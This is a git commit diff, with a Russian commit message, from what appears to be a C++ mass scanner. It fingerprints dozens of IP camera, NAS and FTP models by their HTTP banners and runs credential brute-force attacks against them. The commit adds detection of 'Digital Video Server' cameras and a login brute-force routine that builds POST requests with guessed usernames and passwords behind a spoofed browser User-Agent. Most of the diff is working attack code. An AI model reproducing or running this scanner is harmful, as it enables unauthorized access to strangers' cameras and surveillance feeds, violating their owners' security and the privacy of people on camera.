Добавлен детект DVS-камеры.

This commit is contained in:
cora32 2014-11-23 14:47:22 +03:00
parent 369f6440fe
commit 4dd27f9605
2 changed files with 94 additions and 51 deletions

View File

@ -1579,7 +1579,7 @@ int Connector::_EstablishConnection(char *ip, int port, char *request, conSTR *C
++offlines;
if(iError == 10055)
{
stt->doEmitionRedFoundData("[SOCKERR 10055] " + QString("Connection pool depleted ") + QString(ip) + ":" + QString::number(port));
stt->doEmitionRedFoundData("[SOCKERR 10055] Connection pool depleted " + QString(ip) + ":" + QString::number(port));
}
else if(iError == 10049)
{
@ -2200,6 +2200,10 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
{
negVector.push_back("403 Forbidden");
}
else if(strcmp(SPEC, "DVS") == 0)
{
negVector.push_back("Non-Existed");
}
else
{
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
@ -2335,6 +2339,33 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, "\r\n\r\n");
strcat(request, passString);
delete []passString;
}
else if(strcmp(SPEC, "DVS") == 0)
{
strcpy(request, "POST /login HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
int loginLength = strlen(login);
int passLength = strlen(pass);
int sz = loginLength + passLength + strlen("langs=en&user=&password=&submit=+Login+");
char *passString = new char[sz + 1];
ZeroMemory(passString, sizeof(passString));
strcpy(passString, "langs=en&user=");
strcat(passString, login);
strcat(passString, "&password=");
strcat(passString, pass);
strcat(passString, "&submit=+Login+");
strcat(request, "\r\nContent-Length: ");
char tempBuff[16] = {0};
strcat(request, itoa(sz, tempBuff, 10));
strcat(request, "\r\n\r\n");
strcat(request, passString);
delete []passString;
};
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);

View File

@ -291,6 +291,7 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip)
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
if(strstr(buffcpy, "digital video server") != NULL && strstr(buffcpy, "gui.css") != NULL) return 47; //Digital Video Server
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
@ -311,64 +312,71 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip)
//> 1600
int _mainFinderSecond(char *buffcpy, int port, char *ip)
{
if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|| strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL)
if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL
|| (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|| strstr(buffcpy, "401 unauthorized access denied") != NULL
|| strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL
&& strstr(buffcpy, " 401\r\n") != NULL)
)
&& strstr(buffcpy, "digest realm") != NULL
&& strstr(buffcpy, "basic realm") == NULL
) return 101;
if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|| strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL)
) return 1;
if(strstr(buffcpy, "netwave ip camera")) return 11;
if(strstr(buffcpy, "live view / - axis")) return 12;
if(strstr(buffcpy, "vilar ipcamera")) return 13;
if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14;
if(strstr(buffcpy, "httpfileserver")) return 15;
&& strstr(buffcpy, "digest realm") != NULL && strstr(buffcpy, "basic realm") == NULL
) return 101;
if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL
|| (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL )
|| strstr(buffcpy, "401 unauthorized access denied") != NULL
|| strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL
&& strstr(buffcpy, " 401\r\n") != NULL)
) return 1;
if(strstr(buffcpy, "netwave ip camera")) return 11;
if(strstr(buffcpy, "live view / - axis")) return 12;
if(strstr(buffcpy, "vilar ipcamera")) return 13;
if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14;
if(strstr(buffcpy, "httpfileserver")) return 15;
if(strstr(buffcpy, "real-time ip camera monitoring system") != NULL ||
strstr(buffcpy, "server push mode") != NULL
) return 17; //Real-time IP Camera Monitoring System
if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras
if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras
if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon
if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40
if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera
if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40
if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera
if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras
if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX
if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //axis cameras
if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL && strstr(buffcpy, "<b class=\"xb1\"></b>") != NULL) return 32; //web ip cam
if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam
) return 17; //Real-time IP Camera Monitoring System
if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras
if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras
if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras
if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon
if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40
if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera
if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40
if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera
if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras
if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX
if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //axis cameras
if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL && strstr(buffcpy, "<b class=\"xb1\"></b>") != NULL) return 32; //web ip cam
if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam
if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL)
|| (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam
if((strstr(buffcpy, "easy cam") != NULL && strstr(buffcpy, "easy life") != NULL)
|| strstr(buffcpy, "ipcamera") != NULL && strstr(buffcpy, "/tool.js") != NULL) return 35; //EasyCam
if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180
if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam
if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300
if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera
if(strstr(buffcpy, "nw_camera") != NULL && strstr(buffcpy, "/cgi-bin/getuid") != NULL) return 42; //NW_camera
if(strstr(buffcpy, "micros") != NULL && strstr(buffcpy, "/gui/gui_outer_frame.shtml") != NULL) return 43; //NW_camera
|| strstr(buffcpy, "ipcamera") != NULL && strstr(buffcpy, "/tool.js") != NULL) return 35; //EasyCam
if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180
if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam
if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye
if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300
if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera
if(strstr(buffcpy, "nw_camera") != NULL && strstr(buffcpy, "/cgi-bin/getuid") != NULL) return 42; //NW_camera
if(strstr(buffcpy, "micros") != NULL && strstr(buffcpy, "/gui/gui_outer_frame.shtml") != NULL) return 43; //NW_camera
if(strstr(buffcpy, "lapassword") != NULL
&& strstr(buffcpy, "lausername") != NULL
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
if(strstr(buffcpy, "digital video server") != NULL && strstr(buffcpy, "gui.css") != NULL) return 47; //Digital Video Server
if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL)
|| (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam
if(((strstr(buffcpy, "220") != NULL) && (port == 21)) ||
(strstr(buffcpy, "220 diskStation ftp server ready") != NULL) ||
(strstr(buffcpy, "220 ftp server ready") != NULL)
|| strstr(buffcpy, "500 'get': command not understood") != NULL
) return 16; // 16 - FTP
) return 16; // 16 - FTP
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
@ -378,11 +386,11 @@ int _mainFinderSecond(char *buffcpy, int port, char *ip)
|| strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL
|| strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL
|| strstr(buffcpy, "ipcam") != NULL
) return 0;
) return 0;
if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1;
if(globalSearchPrnt(buffcpy) == -1) return -1;
if(strstr(buffcpy, "<form ") != NULL && strstr(buffcpy, "302 found") == NULL) return 10;
if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1;
if(globalSearchPrnt(buffcpy) == -1) return -1;
if(strstr(buffcpy, "<form ") != NULL && strstr(buffcpy, "302 found") == NULL) return 10;
return 3; //Suspicious
};
@ -1744,6 +1752,10 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
else if(flag == 46) //Buffalo disk
{
_specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO");
}
else if(flag == 47) //Digital Video Server
{
_specWEBIPCAMBrute(ip, p, hl, "[DVS] Camera", flag, "[DVS] Camera", "Web Authorization", cp, recd, "DVS");
}
else if(flag == 20) //AXIS Camera
{